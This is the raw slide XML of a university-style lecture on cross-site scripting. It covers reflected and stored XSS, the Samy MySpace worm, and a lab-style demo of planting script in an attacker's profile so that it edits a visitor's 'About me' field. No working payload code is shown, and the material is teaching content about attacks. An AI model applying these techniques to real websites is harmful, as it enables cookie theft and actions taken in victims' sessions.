          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-NZ" sz="1000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>①</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2107172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9E9F0-98E6-4722-B73E-1143B66515CE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Inject the request into attacker’s profile</a:t>
            </a:r>
            <a:endParaRPr lang="en-NZ" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A85F4FC6-011D-41EA-848A-7C5BAE535E39}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Samy can place the malicious code into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>his</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> profile and then wait for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>others</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to visit his profile page.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Login</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>Alice</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>’s account and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>view</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Samy’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> profile. As soon as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Samy’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> profile is loaded, malicious code will get executed.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>On checking </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>Alice</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> profile, we can see that “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>SAMY IS MY HERO</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>” is added to the “About me” field of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>her</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> profile.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-NZ" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF8D5B1A-5653-4E00-A2FB-B4CDC7F13AE6}"/>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24</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194119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C84A2-1EFE-4ECE-B1EF-0D0C13603830}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Summary</a:t>
            </a:r>
            <a:endParaRPr lang="en-NZ" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3B3DED23-5134-4392-B78E-E50F27826925}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This lecture</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Types of XSS attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>How to launch XSS attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Next</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Create a self-propagating XSS worm</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Countermeasures against XSS attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-NZ" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D292BCBB-808C-4887-898B-0A0BF37154CE}"/>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25</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284797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0BD0-5A68-4BC5-A3D0-2A18943D4C54}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>?</a:t>
            </a:r>
            <a:endParaRPr lang="en-NZ" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA341394-3BFF-47DD-A725-6C8B9121CC58}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cross-site Scripting (XSS) refers to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>client-side</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>code injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>An attacker can execute malicious script in a users </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>An attacker uses a vulnerable website as a delivery mechanism to deliver the script</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The most commonly abused is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>JavaScript</a:t>
            </a:r>
            <a:endParaRPr lang="en-NZ" u="sng" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B28025B-EF24-4738-B1D7-45A057E386D0}"/>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2</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3340821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E6AF-82C0-4CB4-B806-C9481D01F2AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Samy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Worm</a:t>
            </a:r>
            <a:endParaRPr lang="en-NZ" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{933C5DDE-83A5-4C62-992D-97D01AD2053F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="192024" y="867512"/>
            <a:ext cx="8778240" cy="2324723"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The worm carried a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> that would display the string “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>but most of all, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>samy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> is my hero</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>” on a victim’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>MySapce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> profile page. When a user viewed that profile page, the payload would be planted on their own profile page. Within just </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>20 hours</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> of its October 4, 2005 release, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>over one million users </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>had run the payload, making </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Samy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> the faster spreading </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>virus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> of all time.</a:t>
            </a:r>
            <a:endParaRPr lang="en-NZ" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5ED6C5D6-3F29-4462-B68D-A8BAF75B81C3}"/>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3</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="888888"/>
              </a:solidFill>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7ACB02CF-D860-4807-AF6E-973F68D5A028}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect t="15113" b="16104"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4581987" y="3279034"/>
            <a:ext cx="3086100" cy="1061358"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8002BDE1-E12C-4C02-A515-FBFC921139E7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2139043" y="3279035"/>
            <a:ext cx="1885950" cy="1060847"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B70C6601-1962-4C28-8B3D-5A4D0FA0BB01}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2188028" y="4380381"/>
            <a:ext cx="1853294" cy="300082"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1350" b="1" dirty="0" err="1"/>
              <a:t>Samy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1350" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1350" b="1" dirty="0" err="1"/>
              <a:t>Kamkar</a:t>
            </a:r>
            <a:endParaRPr lang="en-NZ" sz="1350" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1492081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8F8F-E48B-4C3E-B3EA-37665B15747E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> attack</a:t>
            </a:r>
            <a:endParaRPr lang="en-NZ" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA974FCC-176F-4E7D-8177-F1CE51F2A234}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="192024" y="867512"/>
            <a:ext cx="4409879" cy="3763103"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In XSS, an attacker injects his/her malicious code to the victim’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>browser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> via the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>target website</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>When code comes from a website, it is considered as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" u="sng" dirty="0"/>
              <a:t>trusted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> with respect to the website, so it can access and change the content on the pages, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>read cookies </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>belonging to the website and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sending out requests</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> on behalf of the user.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Basically, code can do whatever the user can do inside the session</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-NZ" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{79713D60-5721-4B25-B3FA-A53542CB04BB}"/>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4</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="888888"/>
              </a:solidFill>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B0466F7-0C71-498E-8057-6A9E2B1DCB25}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4601903" y="1405491"/>
            <a:ext cx="4368361" cy="2479638"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4227335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17AF-6BEA-4D73-A96A-D9B375255036}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Types of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> attacks</a:t>
            </a:r>
            <a:endParaRPr lang="en-NZ" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A099F58A-4648-4D95-A1EB-5890CDC41335}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Non-persistent (Reflected) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Persistent (Stored) XSS Attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-NZ" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{91B3F6B5-32C6-4503-B20F-9DBB1FB74141}"/>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5</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364594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9940-F031-44F2-BCC7-84F03F5C58C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Non-persistent (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Reflected</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> attack</a:t>
            </a:r>
            <a:endParaRPr lang="en-NZ" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B9488468-977D-43B2-A669-F95679FF2768}"/>
              </a:ext>
